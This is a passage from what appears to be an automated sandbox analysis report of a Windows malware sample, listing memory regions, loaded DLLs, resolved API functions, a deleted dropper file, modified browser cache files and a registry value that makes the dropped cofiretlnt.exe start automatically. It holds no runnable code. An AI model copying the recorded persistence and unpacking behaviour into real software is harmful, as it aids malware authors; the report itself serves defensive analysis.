| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00060000 | 0x000c6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a6fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x00207fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00228fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00248fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0026ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00276fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x00907fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000910000 | 0x00910000 | 0x00a90fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x00aa0000 | 0x00d6efff | Memory Mapped File | r |
|
|
|
- |
| jta.exe | 0x01140000 | 0x01162fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x0000000001170000 | 0x01170000 | 0x0256ffff | Pagefile Backed Memory | r |
|
|
|
- |
| esent.dll | 0x75000000 | 0x751a2fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75f90000 | 0x75f94fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
Module (23)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x75a10000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76220000 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x3df3ec |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3df334 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3df34c |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x3df370 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3df370 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x3df370 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x3df370 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x75a19894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x75a19cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77e4e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x762d6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x762311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76231700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76231809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x762317ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7624eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x762314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76235929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x762314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x762311c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x76253102 |
|
1 |
Keyboard (32)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Read | virtual_key_code = VK_HELP, result_out = 0 |
|
32 |
Process #9: cofiretlnt.exe
96
24
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:04, Reason: Child Process |
| Unmonitor | End Time: 00:03:08, Reason: Self Terminated |
| Monitor Duration | 00:01:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2b4 |
| Parent PID | 0x808 (c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
220
0x
348
0x
954
0x
524
0x
550
0x
554
0x
464
0x
770
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00032fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00060000 | 0x000c6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000e7fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x00108fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00128fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0014ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00196fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00190fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a6fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x001b0000 | 0x001b0fff | Memory Mapped File | r |
|
|
|
- |
| index.dat | 0x001b0000 | 0x001bbfff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x001d0000 | 0x001d7fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x001e0000 | 0x001effff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000300000 | 0x00300000 | 0x00300fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x00310fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000360000 | 0x00360000 | 0x00367fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x00970fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x00980000 | 0x00c4efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000c50000 | 0x00c50000 | 0x00e7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c50000 | 0x00c50000 | 0x00d2efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000db0000 | 0x00db0000 | 0x00deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e00000 | 0x00e00000 | 0x00e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e40000 | 0x00e40000 | 0x00e7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e80000 | 0x00e80000 | 0x00f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f80000 | 0x00f80000 | 0x0105ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fa0000 | 0x00fa0000 | 0x00fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001020000 | 0x01020000 | 0x0105ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010f0000 | 0x010f0000 | 0x0112ffff | Private Memory | rw |
|
|
|
- |
| jta.exe | 0x01140000 | 0x01162fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x0000000001170000 | 0x01170000 | 0x0256ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002580000 | 0x02580000 | 0x0267ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002680000 | 0x02680000 | 0x027fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026c0000 | 0x026c0000 | 0x027bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027c0000 | 0x027c0000 | 0x027fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002840000 | 0x02840000 | 0x0293ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a20000 | 0x02a20000 | 0x02a5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ae0000 | 0x02ae0000 | 0x02bdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002be0000 | 0x02be0000 | 0x02daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002da0000 | 0x02da0000 | 0x02daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02f8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ed0000 | 0x02ed0000 | 0x02fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fe0000 | 0x02fe0000 | 0x030dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003140000 | 0x03140000 | 0x0317ffff | Private Memory | rw |
|
|
|
- |
| fwpuclnt.dll | 0x74d10000 | 0x74d47fff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x74f90000 | 0x74f95fff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x74fa0000 | 0x74fa4fff | Memory Mapped File | rwx |
|
|
|
- |
| winrnr.dll | 0x74fb0000 | 0x74fb7fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x74fc0000 | 0x74ffbfff | Memory Mapped File | rwx |
|
|
|
- |
| esent.dll | 0x75000000 | 0x751a2fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x751f0000 | 0x75202fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| pnrpnsp.dll | 0x75350000 | 0x75361fff | Memory Mapped File | rwx |
|
|
|
- |
| napinsp.dll | 0x75370000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x75380000 | 0x75387fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75390000 | 0x7539dfff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x753a0000 | 0x753f9fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x75400000 | 0x75405fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x75410000 | 0x7541ffff | Memory Mapped File | rwx |
|
|
|
- |
| sensapi.dll | 0x75420000 | 0x75425fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x75430000 | 0x7543cfff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x75440000 | 0x75454fff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x75460000 | 0x754b1fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x754c0000 | 0x754c6fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x754d0000 | 0x754ebfff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x754f0000 | 0x75533fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x75540000 | 0x756ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x756e0000 | 0x7571afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75720000 | 0x75735fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x75740000 | 0x7574cfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75750000 | 0x75766fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x75a00000 | 0x75a02fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75ac0000 | 0x75bf5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75f90000 | 0x75f94fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76450000 | 0x76484fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x767e0000 | 0x769dafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77920000 | 0x77a14fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77df0000 | 0x77df5fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat | 48.00 KB |
MD5:
0d7742564c1bf905226155ddc8801d2b
SHA1: 72fd26e88b22a795f79e85703fb4a6ce40a994e0 SHA256: 91425e000a3385e9c11c19ed0756d6add1f6e049de221c21c9b49873ecb278da SSDeep: 48:qHv5Jyik0i5HXWyAl7UGAnwniGhAnwwoSHXl16YSYP5lPrCoNqK5B5NA+KNi3bR/:qH7EH3WyBcaUMz3P5s+XA8dRTwLDP |
|
|
| c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat | 32.00 KB |
MD5:
b25ed5680eaebd743130ba81c6fa3e7f
SHA1: bdd244a2878fce8ddd7b97a1ae4ed6dc6f38bd17 SHA256: cd34c6d5341fa3554bf696d02934877f38e196bdef1d30720a53f923892b7779 SSDeep: 12:qjUXZ4OE32Y3XckQslQKy3gTLPrOLWlrOu933ekIQ3rIQbq93ILtrOLWlrOR:qjU6AXkQwQc3rOirOwekIyrIUZrOirO |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat | 64.00 KB |
MD5:
29205bc6727f0b2b394d25d0018c253d
SHA1: 486aa84638d334c0d96aa32d0bf05638ee10deaa SHA256: 5b8533df6abc601a53ad41667ee7f14dccaa08505bb4aae0ff72dae34b813d8d SSDeep: 96:qvzEMiozzcwjQ2ubh9NdeigWEsy7X66irdu0f2VRozqAUttkqYY1Ig9tPCRT8:YzV8TQ76rdu9fAwYOM |
|
|
Host Behavior
File (1)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe | - |
|
1 |
Registry (1)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Write Value | - | value_name = cofiretlnt, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe", size = 134, type = REG_SZ |
|
1 |
Module (24)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x75a10000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76220000 |
|
1 | |
| Get Handle | c:\users\aetadzjz\appdata\local\temp\jta.exe | base_address = 0x1140000 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x2ff46c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x2ff3b4 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x2ff3cc |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x2ff3f0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x2ff3f0 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x2ff3f0 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x2ff3f0 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x75a19894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x75a19cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77e4e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x762d6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x762311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76231700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76231809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x762317ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7624eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x762314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76235929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x762314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x762311c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x76253102 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = LDWCN705BA84C, wndproc_parameter = 0 |
|
1 |
Keyboard (32)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Read | virtual_key_code = VK_HELP, result_out = 0 |
|
32 |
System (28)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 177950 |
|
3 | |
| Get Time | type = Ticks, time = 178964 |
|
1 | |
| Get Time | type = Ticks, time = 179978 |
|
1 | |
| Get Time | type = Ticks, time = 180992 |
|
1 | |
| Get Time | type = Ticks, time = 182006 |
|
1 | |
| Get Time | type = Ticks, time = 182053 |
|
2 | |
| Get Time | type = Ticks, time = 183020 |
|
1 | |
| Get Time | type = Ticks, time = 184034 |
|
1 | |
| Get Time | type = Ticks, time = 185048 |
|
1 | |
| Get Time | type = Ticks, time = 186062 |
|
1 | |
| Get Time | type = Ticks, time = 187076 |
|
1 | |
| Get Time | type = Ticks, time = 188090 |
|
1 | |
| Get Time | type = Ticks, time = 215764 |
|
4 | |
| Get Time | type = Ticks, time = 236856 |
|
4 | |
| Get Time | type = Ticks, time = 239243 |
|
1 | |
| Get Info | type = Operating System |
